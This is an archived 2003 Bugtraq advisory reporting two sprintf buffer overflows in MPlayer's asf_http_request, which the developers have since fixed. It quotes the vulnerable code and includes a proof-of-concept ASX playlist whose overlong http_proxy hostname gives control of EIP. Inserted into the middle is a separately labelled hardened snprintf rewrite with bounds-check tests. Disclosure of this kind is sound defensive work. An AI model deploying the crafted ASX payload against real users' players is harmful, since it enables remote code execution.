Date: Thu, 25 Sep 2003 19:17:49 -0500
From: "Otero, Hernan" <hernan.otero@....com>
To: "'bugtraq@...urityfocus.com'" <bugtraq@...urityfocus.com>
Subject: Mplayer Buffer Overflow



Favorite Linux Player Buffer Overflow
 

 Product:             MPlayer
 Developers:          http://www.mplayerhq.hu
 OS:                  Ported to all *NIX and Win32
 Remote Exploitable:  YES

The developers have been contacted and the problem has been fixed; updating
your MPlayer version is recommended.

 In the source tree there is a file called asf_streaming.c. This file has a
function named asf_http_request, and that function has two buffer overflows,
both in its sprintf lines.
 
 
 asf_http_request( ... ) {
     char str[250];
     ....
     ...
     ..
     sprintf( str, "Host: %s:%d", server_url->hostname, server_url->port );
     ....
     ...
     ..
     sprintf( str, "Host: %s:%d", url->hostname, url->port );
     ....
     ...
     ..
 }
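 The following is an added example, not code from the advisory or from the
MPlayer project. It shows the same "Host:" header construction written so
that the destination size is enforced: snprintf() with the buffer size, and
the truncated/failed case reported to the caller instead of silently running
past the end of str[]. The url_t struct, build_host_header() and the check_*
helpers are assumptions of this example (MPlayer's own URL type is not
reproduced here); the 250-byte buffer size is taken from the advisory.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define STR_LEN 250   /* same size as str[] in the advisory's asf_http_request */

/* Hypothetical minimal URL structure with only the two fields used by the
 * vulnerable sprintf() call (an assumption of this example). */
typedef struct {
    const char *hostname;
    int port;
} url_t;

/* Hardened replacement for sprintf(str, "Host: %s:%d", ...).
 * Returns true only when the complete header (plus NUL) fit into dst.
 * On truncation or encoding error dst is left as an empty string, so a
 * caller that ignores the result still holds a well-formed C string. */
bool build_host_header(char *dst, size_t dst_len, const url_t *url)
{
    if (dst == NULL || dst_len == 0 || url == NULL || url->hostname == NULL)
        return false;

    int n = snprintf(dst, dst_len, "Host: %s:%d", url->hostname, url->port);
    if (n < 0 || (size_t)n >= dst_len) {
        dst[0] = '\0';
        return false;           /* would not fit: refuse instead of overflowing */
    }
    return true;
}

/* Builds a constructed hostname of `len` 'a' characters into buf (buf must
 * hold len + 1 bytes). Used only to exercise the bounds check below. */
static void make_hostname(char *buf, size_t len)
{
    memset(buf, 'a', len);
    buf[len] = '\0';
}

/* Self-checks returning 1 when build_host_header() behaves as intended. */
int check_normal_host(void)
{
    char str[STR_LEN];
    url_t u = { "www.example.com", 80 };   /* constructed sample input */
    return build_host_header(str, sizeof str, &u) &&
           strcmp(str, "Host: www.example.com:80") == 0;
}

/* Longest hostname that fits with port 80: 250 - strlen("Host: ") -
 * strlen(":80") - 1 (NUL) = 240 characters. */
int check_hostname_at_limit(void)
{
    char str[STR_LEN], host[241];
    make_hostname(host, 240);
    url_t u = { host, 80 };
    return build_host_header(str, sizeof str, &u) && strlen(str) == 249;
}

/* One character more must be rejected and leave an empty string behind. */
int check_hostname_one_over(void)
{
    char str[STR_LEN], host[242];
    make_hostname(host, 241);
    url_t u = { host, 80 };
    return !build_host_header(str, sizeof str, &u) && str[0] == '\0';
}

/* A hostname far larger than the buffer (as in the advisory's ASX) is
 * rejected the same way; nothing is written past str[]. */
int check_hostname_oversized(void)
{
    char str[STR_LEN], host[401];
    make_hostname(host, 400);
    url_t u = { host, 8080 };
    return !build_host_header(str, sizeof str, &u) && str[0] == '\0';
}

int main(void)
{
    printf("normal host ok:        %d\n", check_normal_host());
    printf("hostname at limit ok:  %d\n", check_hostname_at_limit());
    printf("one over rejected:     %d\n", check_hostname_one_over());
    printf("oversized rejected:    %d\n", check_hostname_oversized());
    return 0;
}
```

The point of returning a status rather than truncating silently is that a
truncated "Host:" header is still wrong input for the server; the caller
should abort the request for that URL, which is also what closes the
"http_proxy://" path the advisory describes, since the hostname length is
checked at the point of use rather than relying on an earlier MAXHOSTLEN
check that the proxy form bypasses.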

 
  
 At first glance this may look unexploitable (because of the MAXHOSTLEN size
restriction), but with an ASX file like the one below, and a "badsite"
listening on "badport" that sends "\n\n" as its answer, it leads to a buffer
overflow with a fully controllable EIP.
 
 
 <asx version="3.0">
 <title>Bad Site ASX</title>

 <moreinfo href="mailto:info@...site.com" />
 <logo href="http://www.badsite.com/streaming/grupo.gif" style="ICON" />
 <banner href="images/bannermitre.gif">
 <abstract>Bad Site live</abstract>
 <moreinfo target="_blank" href="http://www.badsite.com/" />
 </banner>
 
 <entry>
 <title>NEWS</title>
 <AUTHOR>NEWS</AUTHOR>
 <COPYRIGHT>© All by the news</COPYRIGHT>
 <ref href =
"http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaa"/>
 <logo href="http://www.badsite.com/streaming/grupo.gif" style="ICON" />
 </entry>
 </asx>
 


 Regards,
 
   Hernán Otero
   hernan.otero@....com 

